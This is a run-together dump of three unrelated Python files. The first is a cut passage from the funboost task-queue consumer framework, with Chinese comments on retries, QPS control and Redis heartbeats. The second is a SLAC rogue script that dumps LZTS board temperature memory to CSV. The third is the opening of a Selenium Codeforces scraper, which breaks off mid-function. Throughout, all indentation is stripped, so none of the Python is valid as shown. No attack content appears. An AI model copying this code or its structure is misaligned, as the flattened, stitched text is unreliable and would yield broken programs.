# 框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
t_start_run_fun = time.time()
max_retry_times = self.__get_priority_conf(kw, 'max_retry_times')
current_function_result_status = FunctionResultStatus(self.queue_name, self.consuming_function.__name__, kw['body'])
current_retry_times = 0
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
for current_retry_times in range(max_retry_times + 1):
current_function_result_status = await self._async_run_consuming_function_with_confirm_and_retry(kw, current_retry_times=current_retry_times,
function_result_status=FunctionResultStatus(
self.queue_name, self.consuming_function.__name__,
kw['body']),
)
if current_function_result_status.success is True or current_retry_times == max_retry_times or current_function_result_status.has_requeue:
break
# self._result_persistence_helper.save_function_result_to_mongo(function_result_status)
await simple_run_in_executor(self._result_persistence_helper.save_function_result_to_mongo, current_function_result_status)
if current_function_result_status.success is False and current_retry_times == max_retry_times:
self.logger.critical(
f'函数 {self.consuming_function.__name__} 达到最大重试次数 {self.__get_priority_conf(kw, "max_retry_times")} 后,仍然失败, 入参是 {function_only_params} ')
# self._confirm_consume(kw) # 错得超过指定的次数了,就确认消费了。
await simple_run_in_executor(self._confirm_consume, kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
# self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if self.__get_priority_conf(kw, 'is_using_rpc_mode'):
def push_result():
with RedisMixin().redis_db_frame.pipeline() as p:
p.lpush(kw['body']['extra']['task_id'],
json.dumps(current_function_result_status.get_status_dict(without_datetime_obj=True)))
p.expire(kw['body']['extra']['task_id'], 600)
p.execute()
await simple_run_in_executor(push_result)
# 异步执行不存在线程并发,不需要加锁。
self._execute_task_times_every_unit_time += 1
self._consuming_function_cost_time_total_every_unit_time += time.time() - t_start_run_fun
self._last_execute_task_time = time.time()
if time.time() - self._current_time_for_execute_task_times_every_unit_time > self._unit_time_for_count:
avarage_function_spend_time = round(self._consuming_function_cost_time_total_every_unit_time / self._execute_task_times_every_unit_time, 4)
msg = f'{self._unit_time_for_count} 秒内执行了 {self._execute_task_times_every_unit_time} 次函数 [ {self.consuming_function.__name__} ] ,' \
f'函数平均运行耗时 {avarage_function_spend_time} 秒'
if self._msg_num_in_broker != -1:
if hasattr(self, '_distributed_consumer_statistics'):
active_consumer_num = self._distributed_consumer_statistics.active_consumer_num
else:
active_consumer_num = 1
# msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker * avarage_function_spend_time / active_consumer_num)} 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
msg += f''' ,预计还需要 {time_util.seconds_to_hour_minute_second(self._msg_num_in_broker / (self._execute_task_times_every_unit_time / self._unit_time_for_count) / active_consumer_num)} ''' + \
f''' 时间 才能执行完成 {self._msg_num_in_broker}个剩余的任务'''
self.logger.info(msg)
self._current_time_for_execute_task_times_every_unit_time = time.time()
self._consuming_function_cost_time_total_every_unit_time = 0
self._execute_task_times_every_unit_time = 0
async def _async_run_consuming_function_with_confirm_and_retry(self, kw: dict, current_retry_times,
function_result_status: FunctionResultStatus, ):
"""虽然和上面有点大面积重复相似,这个是为了asyncio模式的,asyncio模式真的和普通同步模式的代码思维和形式区别太大,
框架实现兼容async的消费函数很麻烦复杂,连并发池都要单独写"""
function_only_params = _delete_keys_and_return_new_dict(kw['body'])
function_result_status.run_times = current_retry_times + 1
# noinspection PyBroadException
t_start = time.time()
try:
corotinue_obj = self.consuming_function(**function_only_params)
if not asyncio.iscoroutine(corotinue_obj):
self.logger.critical(f'当前设置的并发模式为 async 并发模式,但消费函数不是异步协程函数,'
f'请不要把消费函数 {self.consuming_function.__name__} 的 concurrent_mode 设置为 4')
# noinspection PyProtectedMember,PyUnresolvedReferences
os._exit(444)
if self._function_timeout == 0:
rs = await corotinue_obj
# rs = await asyncio.wait_for(corotinue_obj, timeout=4)
else:
rs = await asyncio.wait_for(corotinue_obj, timeout=self._function_timeout)
function_result_status.result = rs
function_result_status.success = True
# self._confirm_consume(kw)
await simple_run_in_executor(self._confirm_consume, kw)
if self.__get_priority_conf(kw, 'do_task_filtering'):
# self._redis_filter.add_a_value(function_only_params) # 函数执行成功后,添加函数的参数排序后的键值对字符串到set中。
await simple_run_in_executor(self._redis_filter.add_a_value, function_only_params)
if self._log_level <= logging.DEBUG:
result_str_to_be_print = str(rs)[:100] if len(str(rs)) < 100 else str(rs)[:100] + ' 。。。。。 '
self.logger.debug(f' 函数 {self.consuming_function.__name__} '
f'第{current_retry_times + 1}次 运行, 正确了,函数运行时间是 {round(time.time() - t_start, 4)} 秒,'
f'入参是 【 {function_only_params} 】 ,结果是 {result_str_to_be_print} 。 {corotinue_obj} ')
except Exception as e:
if isinstance(e, (PyMongoError,
ExceptionForRequeue)): # mongo经常维护备份时候插入不了或挂了,或者自己主动抛出一个ExceptionForRequeue类型的错误会重新入队,不受指定重试次数逇约束。
self.logger.critical(f'函数 [{self.consuming_function.__name__}] 中发生错误 {type(e)} {e},消息重新入队')
# time.sleep(1) # 防止快速无限出错入队出队,导致cpu和中间件忙
await asyncio.sleep(1)
# return self._requeue(kw)
await simple_run_in_executor(self._requeue, kw)
function_result_status.has_requeue = True
return function_result_status
self.logger.error(f'函数 {self.consuming_function.__name__} 第{current_retry_times + 1}次运行发生错误,'
f'函数运行时间是 {round(time.time() - t_start, 4)} 秒,\n 入参是 {function_only_params} \n 原因是 {type(e)} {e} ',
exc_info=self.__get_priority_conf(kw, 'is_print_detail_exception'))
function_result_status.exception = f'{e.__class__.__name__} {str(e)}'
return function_result_status
@abc.abstractmethod
def _confirm_consume(self, kw):
"""确认消费"""
raise NotImplementedError
def check_heartbeat_and_message_count(self):
self._msg_num_in_broker = self.publisher_of_same_queue.get_message_count()
if time.time() - self._last_timestamp_print_msg_num > 60:
if self._msg_num_in_broker != -1:
self.logger.info(f'队列 [{self._queue_name}] 中还有 [{self._msg_num_in_broker}] 个任务')
self._last_timestamp_print_msg_num = time.time()
if self._msg_num_in_broker != 0:
self._last_timestamp_when_has_task_in_queue = time.time()
return self._msg_num_in_broker
@abc.abstractmethod
def _requeue(self, kw):
"""重新入队"""
raise NotImplementedError
def __apscheduler_job_miss(self, event):
"""
这是 apscheduler 包的事件钩子。
ev.function_args = job.args
ev.function_kwargs = job.kwargs
ev.function = job.func
:return:
"""
# print(event.scheduled_run_time)
misfire_grace_time = self.__get_priority_conf(event.function_kwargs["kw"], 'misfire_grace_time')
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,'
f'比此任务规定的本应该的运行时间 {event.scheduled_run_time} 相比 超过了指定的 {misfire_grace_time} 秒,放弃执行此任务 \n'
f'{event.function_kwargs["kw"]["body"]} ')
self._confirm_consume(event.function_kwargs["kw"])
'''
if self.__get_priority_conf(event.function_kwargs["kw"], 'execute_delay_task_even_if_when_task_is_expired') is False:
self.logger.critical(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} , 此任务放弃执行')
self._confirm_consume(event.function_kwargs["kw"])
else:
self.logger.warning(f'现在时间是 {time_util.DatetimeConverter().datetime_str} ,此任务设置的延时运行已过期 \n'
f'{event.function_kwargs["kw"]["body"]} ,'
f'但框架为了防止是任务积压导致消费延后,所以仍然使其运行一次')
event.function(*event.function_args, **event.function_kwargs)
'''
def _submit_task(self, kw):
if self._judge_is_daylight():
self._requeue(kw)
time.sleep(self.time_interval_for_check_do_not_run_time)
return
function_only_params = _delete_keys_and_return_new_dict(kw['body'], )
if self.__get_priority_conf(kw, 'do_task_filtering') and self._redis_filter.check_value_exists(
function_only_params): # 对函数的参数进行检查,过滤已经执行过并且成功的任务。
self.logger.warning(f'redis的 [{self._redis_filter_key_name}] 键 中 过滤任务 {kw["body"]}')
self._confirm_consume(kw)
return
publish_time = _get_publish_time(kw['body'])
msg_expire_senconds_priority = self.__get_priority_conf(kw, 'msg_expire_senconds')
if msg_expire_senconds_priority and time.time() - msg_expire_senconds_priority > publish_time:
self.logger.warning(
f'消息发布时戳是 {publish_time} {kw["body"].get("publish_time_format", "")},距离现在 {round(time.time() - publish_time, 4)} 秒 ,'
f'超过了指定的 {msg_expire_senconds_priority} 秒,丢弃任务')
self._confirm_consume(kw)
return 0
msg_eta = self.__get_priority_conf(kw, 'eta')
msg_countdown = self.__get_priority_conf(kw, 'countdown')
misfire_grace_time = self.__get_priority_conf(kw, 'misfire_grace_time')
run_date = None
# print(kw)
if msg_countdown:
run_date = time_util.DatetimeConverter(kw['body']['extra']['publish_time']).datetime_obj + datetime.timedelta(seconds=msg_countdown)
if msg_eta:
run_date = time_util.DatetimeConverter(msg_eta).datetime_obj
# print(run_date,time_util.DatetimeConverter().datetime_obj)
# print(run_date.timestamp(),time_util.DatetimeConverter().datetime_obj.timestamp())
# print(self.concurrent_pool)
if run_date:
# print(repr(run_date),repr(datetime.datetime.now(tz=pytz.timezone(frame_config.TIMEZONE))))
self._delay_task_scheduler.add_job(self.concurrent_pool.submit, 'date', run_date=run_date, args=(self._run,), kwargs={'kw': kw},
misfire_grace_time=misfire_grace_time)
else:
self.concurrent_pool.submit(self._run, kw)
if self._is_using_distributed_frequency_control: # 如果是需要分布式控频。
active_num = self._distributed_consumer_statistics.active_consumer_num
self.__frequency_control(self._qps / active_num, self._msg_schedule_time_intercal * active_num)
else:
self.__frequency_control(self._qps, self._msg_schedule_time_intercal)
def __frequency_control(self, qpsx, msg_schedule_time_intercalx):
# 以下是消费函数qps控制代码。无论是单个消费者空频还是分布式消费控频,都是基于直接计算的,没有依赖redis inrc计数,使得控频性能好。
if qpsx == 0: # 不需要控频的时候,就不需要休眠。
return
if qpsx <= 5:
""" 原来的简单版 """
time.sleep(msg_schedule_time_intercalx)
elif 5 < qpsx <= 20:
""" 改进的控频版,防止消息队列中间件网络波动,例如1000qps使用redis,不能每次间隔1毫秒取下一条消息,
如果取某条消息有消息超过了1毫秒,后面不能匀速间隔1毫秒获取,time.sleep不能休眠一个负数来让时光倒流"""
time_sleep_for_qps_control = max((msg_schedule_time_intercalx - (time.time() - self._last_submit_task_timestamp)) * 0.99, 10 ** -3)
# print(time.time() - self._last_submit_task_timestamp)
# print(time_sleep_for_qps_control)
time.sleep(time_sleep_for_qps_control)
self._last_submit_task_timestamp = time.time()
else:
"""基于当前消费者计数的控频,qps很大时候需要使用这种"""
if time.time() - self._last_start_count_qps_timestamp > 1:
self._has_execute_times_in_recent_second = 1
self._last_start_count_qps_timestamp = time.time()
else:
self._has_execute_times_in_recent_second += 1
# print(self._has_execute_times_in_recent_second)
if self._has_execute_times_in_recent_second >= qpsx:
time.sleep((1 - (time.time() - self._last_start_count_qps_timestamp)) * 1)
@decorators.FunctionResultCacher.cached_function_result_for_a_time(120)
def _judge_is_daylight(self):
if self._is_do_not_run_by_specify_time_effect and (
self._do_not_run_by_specify_time[0] < time_util.DatetimeConverter().time_str < self._do_not_run_by_specify_time[1]):
self.logger.warning(
f'现在时间是 {time_util.DatetimeConverter()} ,现在时间是在 {self._do_not_run_by_specify_time} 之间,不运行')
return True
def wait_for_possible_has_finish_all_tasks(self, minutes: int = 3):
"""
判断队列所有任务是否消费完成了。
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
一般是和celery一样,是永久运行的后台任务,永远无限死循环去任务执行任务,但有的人有判断是否执行完成的需求。
:param minutes: 消费者连续多少分钟没执行任务任务 并且 消息队列中间件中没有,就判断为消费完成,为了防止是长耗时任务,一般判断完成是真正提供的minutes的2个周期时间。
:return:
"""
if minutes <= 1:
raise ValueError('疑似完成任务,判断时间最少需要设置为3分钟内,最好是是10分钟')
no_task_time = 0
while 1:
# noinspection PyBroadException
message_count = self._msg_num_in_broker
# print(message_count,self._last_execute_task_time,time.time() - self._last_execute_task_time)
if message_count == 0 and self._last_execute_task_time != 0 and (time.time() - self._last_execute_task_time) > minutes * 60:
no_task_time += 30
else:
no_task_time = 0
time.sleep(30)
if no_task_time > minutes * 60:
break
def clear_filter_tasks(self):
RedisMixin().redis_db_frame.delete(self._redis_filter_key_name)
self.logger.warning(f'清空 {self._redis_filter_key_name} 键的任务过滤')
def __str__(self):
return f'队列为 {self.queue_name} 函数为 {self.consuming_function} 的消费者'
def wait_for_possible_has_finish_all_tasks_by_conusmer_list(consumer_list: typing.List[AbstractConsumer], minutes: int = 3):
"""
判断多个消费者是否消费完成了。
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
一般是和celery一样,是永久运行的后台任务,永远无限死循环去任务执行任务,但有的人有判断是否执行完成的需求。
:param consumer_list: 多个消费者列表
:param minutes: 消费者连续多少分钟没执行任务任务 并且 消息队列中间件中没有,就判断为消费完成。为了防止是长耗时任务,一般判断完成是真正提供的minutes的2个周期时间。
:return:
"""
with BoundedThreadPoolExecutor(len(consumer_list)) as pool:
for consumer in consumer_list:
pool.submit(consumer.wait_for_possible_has_finish_all_tasks(minutes))
# noinspection PyProtectedMember
class ConcurrentModeDispatcher(LoggerMixin):
def __init__(self, consumerx: AbstractConsumer):
self.consumer = consumerx
self._concurrent_mode = self.consumer._concurrent_mode
self.timeout_deco = None
if self._concurrent_mode in (1, 5):
self.timeout_deco = decorators.timeout
elif self._concurrent_mode == 2:
self.timeout_deco = gevent_timeout_deco
elif self._concurrent_mode == 3:
self.timeout_deco = evenlet_timeout_deco
self.logger.warning(f'{self.consumer} 设置并发模式'
f'为{ConsumersManager.get_concurrent_name_by_concurrent_mode(self._concurrent_mode)}')
def check_all_concurrent_mode(self):
if ConsumersManager.global_concurrent_mode is not None and self.consumer._concurrent_mode != ConsumersManager.global_concurrent_mode:
ConsumersManager.show_all_consumer_info()
# print({self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode})
if not {self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode}.issubset({1, 4, 5}):
# threding、asyncio、solo 这几种模式可以共存。但同一个解释器不能同时选择 gevent + 其它并发模式,也不能 eventlet + 其它并发模式。
raise ValueError('''由于猴子补丁的原因,同一解释器中不可以设置两种并发类型,请查看显示的所有消费者的信息,
搜索 concurrent_mode 关键字,确保当前解释器内的所有消费者的并发模式只有一种(或可以共存),
asyncio threading single_thread 并发模式可以共存,但gevent和threading不可以共存,
gevent和eventlet不可以共存''')
ConsumersManager.global_concurrent_mode = self.consumer._concurrent_mode
def build_pool(self):
if self.consumer._concurrent_pool is not None:
return self.consumer._concurrent_pool
pool_type = None # 是按照ThreadpoolExecutor写的三个鸭子类,公有方法名和功能写成完全一致,可以互相替换。
if self._concurrent_mode == 1:
pool_type = CustomThreadPoolExecutor
# pool_type = BoundedThreadPoolExecutor
elif self._concurrent_mode == 2:
pool_type = GeventPoolExecutor
elif self._concurrent_mode == 3:
pool_type = CustomEventletPoolExecutor
elif self._concurrent_mode == 4:
pool_type = AsyncPoolExecutor
elif self._concurrent_mode == 5:
pool_type = SoloExecutor
if self._concurrent_mode == 4:
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num, loop=self.consumer._specify_async_loop)
else:
# print(pool_type)
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num)
# print(self._concurrent_mode,self.consumer._concurrent_pool)
return self.consumer._concurrent_pool
def schedulal_task_with_no_block(self):
if ConsumersManager.schedual_task_always_use_thread:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
else:
if self._concurrent_mode in [1, 4, 5]:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
elif self._concurrent_mode == 2:
g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
elif self._concurrent_mode == 3:
g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
# elif self._concurrent_mode == 4:
# t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
# ConsumersManager.schedulal_thread_to_be_join.append(t)
# t.start()
# elif self._concurrent_mode ==5:
class DistributedConsumerStatistics(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
为了兼容模拟mq的中间件(例如redis,他没有实现amqp协议,redis的list结构和真mq差远了),获取一个队列有几个连接活跃消费者数量。
分布式环境中的消费者统计。主要目的有两点
1、统计活跃消费者数量用于分布式控频。
获取分布式的消费者数量后,用于分布式qps控频。如果不获取全环境中的消费者数量,则只能用于当前进程中的消费控频。
即使只有一台机器,例如把xx.py启动3次,xx.py的consumer设置qps为10,如果不使用分布式控频,会1秒钟最终运行30次函数而不是10次。
2、记录分布式环境中的活跃消费者的所有消费者 id,如果消费者id不在此里面说明已掉线或关闭,消息可以重新分发,用于不支持服务端天然消费确认的中间件。
"""
def __init__(self, queue_name: str, consumer_identification: str, consumer_identification_map: dict):
self._consumer_identification = consumer_identification
self._consumer_identification_map = consumer_identification_map
self._queue_name = queue_name
self._redis_key_name = f'funboost_hearbeat_queue__str:{queue_name}'
self.active_consumer_num = 1
self._last_show_consumer_num_timestamp = 0
self._queue__consumer_identification_map_key_name = f'funboost_hearbeat_queue__dict:{self._queue_name}'
self._server__consumer_identification_map_key_name = f'funboost_hearbeat_server__dict:{nb_log_config_default.computer_ip}'
def run(self):
self.send_heartbeat()
decorators.keep_circulating(10, block=False)(self.send_heartbeat)()
decorators.keep_circulating(5, block=False)(self._show_active_consumer_num)() # 主要是为快速频繁统计分布式消费者个数,快速调整分布式qps控频率。
def _send_heartbeat_with_dict_value(self, redis_key, ):
# 发送当前消费者进程心跳的,值是字典,按一个机器或者一个队列运行了哪些进程。
results = self.redis_db_frame.smembers(redis_key)
with self.redis_db_frame.pipeline() as p:
for result in results:
result_dict = json.loads(result)
if time.time() - result_dict['hearbeat_timestamp'] > 15 \
or self._consumer_identification_map['consumer_uuid'] == result_dict['consumer_uuid']:
# 因为这个是10秒钟运行一次,15秒还没更新,那肯定是掉线了。如果消费者本身是自己也先删除。
p.srem(redis_key, result)
self._consumer_identification_map['hearbeat_datetime_str'] = time_util.DatetimeConverter().datetime_str
self._consumer_identification_map['hearbeat_timestamp'] = time.time()
value = json.dumps(self._consumer_identification_map, sort_keys=True)
p.sadd(redis_key, value)
p.execute()
def send_heartbeat(self):
# 根据队列名心跳的,值是字符串,方便值作为其他redis的键名
results = self.redis_db_frame.smembers(self._redis_key_name)
with self.redis_db_frame.pipeline() as p:
for result in results:
if time.time() - float(result.decode().split('&&')[-1]) > 15 or \
self._consumer_identification == result.decode().split('&&')[0]: # 因为这个是10秒钟运行一次,15秒还没更新,那肯定是掉线了。如果消费者本身是自己也先删除。
p.srem(self._redis_key_name, result)
p.sadd(self._redis_key_name, f'{self._consumer_identification}&&{time.time()}')
p.execute()
self._send_heartbeat_with_dict_value(self._queue__consumer_identification_map_key_name)
self._send_heartbeat_with_dict_value(self._server__consumer_identification_map_key_name)
def _show_active_consumer_num(self):
self.active_consumer_num = self.redis_db_frame.scard(self._redis_key_name) or 1
if time.time() - self._last_show_consumer_num_timestamp > 60:
self.logger.info(f'分布式所有环境中使用 {self._queue_name} 队列的,一共有 {self.active_consumer_num} 个消费者')
self._last_show_consumer_num_timestamp = time.time()
def get_queue_heartbeat_ids(self, without_time: bool):
if without_time:
return [idx.decode().split('&&')[0] for idx in self.redis_db_frame.smembers(self._redis_key_name)]
else:
return [idx.decode() for idx in self.redis_db_frame.smembers(self._redis_key_name)]
class ActiveCousumerProcessInfoGetter(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
获取分布式环境中的消费进程信息。
使用这里面的4个方法需要相应函数的@boost装饰器设置 is_send_consumer_hearbeat_to_redis=True,这样会自动发送活跃心跳到redis。否则查询不到该函数的消费者进程信息。
要想使用消费者进程信息统计功能,用户无论使用何种消息队列中间件类型,用户都必须安装redis,并在 funboost_config.py 中配置好redis链接信息
"""
def _get_all_hearbeat_info_by_redis_key_name(self, redis_key):
results = self.redis_db_frame.smembers(redis_key)
# print(type(results))
# print(results)
# 如果所有机器所有进程都全部关掉了,就没办法还剩一个线程执行删除了,这里还需要判断一次15秒。
active_consumers_processor_info_list = []
for result in results:
result_dict = json.loads(result)
if time.time() - result_dict['hearbeat_timestamp'] < 15:
active_consumers_processor_info_list.append(result_dict)
return active_consumers_processor_info_list
def get_all_hearbeat_info_by_queue_name(self, queue_name) -> typing.List[typing.Dict]:
"""
根据队列名查询有哪些活跃的消费者进程
返回结果例子:
[{
"code_filename": "/codes/funboost/test_frame/my/test_consume.py",
"computer_ip": "172.16.0.9",
"computer_name": "VM_0_9_centos",
"consumer_id": 140477437684048,
"consumer_uuid": "79473629-b417-4115-b516-4365b3cdf383",
"consuming_function": "f2",
"hearbeat_datetime_str": "2021-12-27 19:22:04",
"hearbeat_timestamp": 1640604124.4643965,
"process_id": 9665,
"queue_name": "test_queue72c",
"start_datetime_str": "2021-12-27 19:21:24",
"start_timestamp": 1640604084.0780013
}, ...............]
"""
redis_key = f'funboost_hearbeat_queue__dict:{queue_name}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def get_all_hearbeat_info_by_ip(self, ip=None) -> typing.List[typing.Dict]:
"""
根据机器的ip查询有哪些活跃的消费者进程,ip不传参就查本机ip使用funboost框架运行了哪些消费进程,传参则查询任意机器的消费者进程信息。
返回结果的格式和上面的 get_all_hearbeat_dict_by_queue_name 方法相同。
"""
ip = ip or nb_log_config_default.computer_ip
redis_key = f'funboost_hearbeat_server__dict:{ip}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def _get_all_hearbeat_info_partition_by_redis_key_prefix(self, redis_key_prefix):
keys = self.redis_db_frame.scan(0, f'{redis_key_prefix}*', 10000)[1]
infos_map = {}
for key in keys:
key = key.decode()
infos = self.redis_db_frame.smembers(key)
dict_key = key.replace(redis_key_prefix, '')
infos_map[dict_key] = []
for info_str in infos:
info_dict = json.loads(info_str)
if time.time() - info_dict['hearbeat_timestamp'] < 15:
infos_map[dict_key].append(info_dict)
return infos_map
def get_all_hearbeat_info_partition_by_queue_name(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有队列对应的活跃消费者进程信息,按队列名划分,不需要传入队列名,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对"""
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_queue__dict:')
self.logger.info(f'获取所有队列对应的活跃消费者进程信息,按队列名划分,结果是 {json.dumps(infos_map, indent=4)}')
return infos_map
def get_all_hearbeat_info_partition_by_ip(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,不需要传入机器ip,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对 """
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_server__dict:')
self.logger.info(f'获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,结果是 {json.dumps(infos_map, indent=4)}')
return infos_map
|
lztsReadTempMem.py | #!/usr/bin/env python3
#-----------------------------------------------------------------------------
# Title : ePix 100a board instance
#-----------------------------------------------------------------------------
# File : epix100aDAQ.py evolved from evalBoard.py
# Author : Ryan Herbst, rherbst@slac.stanford.edu
# Modified by: Dionisio Doering
# Created : 2016-09-29
# Last update: 2017-02-01
#-----------------------------------------------------------------------------
# Description:
# Rogue interface to ePix 100a board
#-----------------------------------------------------------------------------
# This file is part of the rogue_example software. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue_example software, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import rogue.hardware.pgp
import pyrogue.utilities.prbs
import pyrogue.utilities.fileio
import pyrogue.gui
import surf
import threading
import signal
import atexit
import yaml
import time
import sys
import argparse
import PyQt4.QtGui
import PyQt4.QtCore
import lztsFpga as fpga
import lztsViewer as vi
import operator
#################
# Set the argument parser
parser = argparse.ArgumentParser()
parser.add_argument(
"--l",
type = int,
required = False,
default = 0,
help = "PGP lane number",
)
parser.add_argument(
"--type",
type = str,
required = True,
help = "define the PCIe card type (either pgp-gen3 or datadev-pgp2b)",
)
# Get the arguments
args = parser.parse_args()
if ( args.type == 'pgp-gen3' ):
pgpVc0 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',args.l,0) # Registers for lzts board
pgpVc1 = rogue.hardware.pgp.PgpCard('/dev/pgpcard_0',args.l,1) # Data for lzts board
print("")
print("PGP Card Version: %x" % (pgpVc0.getInfo().version))
elif ( args.type == 'datadev-pgp2b' ):
#pgpVc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+0) # Registers for lzts board
pgpVc0 = rogue.hardware.data.DataCard('/dev/datadev_0',(7*32)+args.l) # Registers for lzts board
pgpVc1 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+1) # Data for lzts board
pgpVc2 = rogue.hardware.data.DataCard('/dev/datadev_0',(args.l*32)+2) # PRBS stream
#memBase = rogue.hardware.data.DataMap('/dev/datadev_0')
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add data stream to file as channel 1
# File writer
dataWriter = pyrogue.utilities.fileio.StreamWriter(name='dataWriter')
pyrogue.streamConnect(pgpVc1, dataWriter.getChannel(0x1))
## Add pseudoscope to file writer
#pyrogue.streamConnect(pgpVc2, dataWriter.getChannel(0x2))
#pyrogue.streamConnect(pgpVc3, dataWriter.getChannel(0x3))
cmd = rogue.protocols.srp.Cmd()
pyrogue.streamConnect(cmd, pgpVc1)
# Create and Connect SRP to VC1 to send commands
srp = rogue.protocols.srp.SrpV3()
pyrogue.streamConnectBiDir(pgpVc0,srp)
#############################################
# Microblaze console printout
#############################################
class MbDebug(rogue.interfaces.stream.Slave):
def __init__(self):
rogue.interfaces.stream.Slave.__init__(self)
self.enable = False
def _acceptFrame(self,frame):
if self.enable:
p = bytearray(frame.getPayload())
frame.read(p,0)
print('-------- Microblaze Console --------')
print(p.decode('utf-8'))
#######################################
# Custom run control
#######################################
class MyRunControl(pyrogue.RunControl):
def __init__(self,name):
pyrogue.RunControl.__init__(self,name=name,description='Run Controller LZTS', rates={1:'1 Hz', 10:'10 Hz', 30:'30 Hz'})
self._thread = None
def _setRunState(self,dev,var,value,changed):
if changed:
if self.runState.get(read=False) == 'Running':
self._thread = threading.Thread(target=self._run)
self._thread.start()
else:
self._thread.join()
self._thread = None
def _run(self):
self.runCount.set(0)
self._last = int(time.time())
while (self.runState.value() == 'Running'):
delay = 1.0 / ({value: key for key,value in self.runRate.enum.items()}[self._runRate])
time.sleep(delay)
self.root.Trigger()
self._runCount += 1
if self._last != int(time.time()):
self._last = int(time.time())
self.runCount._updated()
##############################
# Set base
##############################
class LztsBoard(pyrogue.Root):
def __init__(self, cmd, dataWriter, srp, **kwargs):
pyrogue.Root.__init__(self, name='lztsBoard', description='LZTS Board')
self.add(dataWriter)
# Add Devices
self.add(fpga.Lzts(name='Lzts', offset=0, memBase=srp, hidden=False, enabled=True))
@self.command()
def Trigger():
cmd.sendCmd(0, 0)
self.add(MyRunControl('runControl'))
#self.add(pyrogue.RunControl(name='runControl', rates={1:'1 Hz', 10:'10 Hz',30:'30 Hz'}, cmd=cmd.sendCmd(0, 0)))
# Export remote objects
self.start(pyroGroup='lztsGui')
# Create board
LztsBoard = LztsBoard(cmd, dataWriter, srp)
#enable all needed devices
LztsBoard.Lzts.PwrReg.enable.set(True)
LztsBoard.Lzts.TempLocMem.enable.set(True)
LztsBoard.Lzts.TempRemMem.enable.set(True)
#locTemp = 256*[0]
#remTemp = 256*[0]
memPtr = LztsBoard.Lzts.PwrReg.FaultTempPtr.get()
memPtr = memPtr + 1
remFile = 'remTemp.csv'
locFile = 'locTemp.csv'
rf = open(remFile, 'w')
lf = open(locFile, 'w')
for i in range(256):
if (memPtr + i) < 256:
j = memPtr + i
else:
j = memPtr + i - 256
#locTemp[i] = LztsBoard.Lzts.TempLocMem.MEM[j].get()
#remTemp[i] = LztsBoard.Lzts.TempRemMem.MEM[j].get()
lf.write('%d,' %(LztsBoard.Lzts.TempLocMem.MEM[j].get()))
rf.write('%d,' %(LztsBoard.Lzts.TempRemMem.MEM[j].get()))
rf.write('\n')
lf.write('\n')
rf.close()
lf.close()
LztsBoard.stop()
exit() |
bot_codeforces.py | import os
import os.path as pth
import re
import time
from threading import Thread
from selenium.webdriver.common.keys import Keys
from bot_cp import *
class bot_codeforces(bot_cp):
def prept(self, prob_code: str, autoload=False):
driver = get_driver()
contestname = self.contestname
driver.get(f'https://codeforces.com/contest/{contestname}/problem/{prob_code.upper()}')
caught = []
for element in driver.find_elements_by_tag_name('pre'):
caught.append(element.text)
with open(reference, 'r') as f:
samplecpp: list = f.readlines()
srcfr, srcto = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-src>\n')]
del samplecpp[srcfr + 1:srcto]
infr, into = [idx for idx, line in enumerate(samplecpp) if line.endswith('python-autofill-in>\n')]
del samplecpp[infr + 1:into]
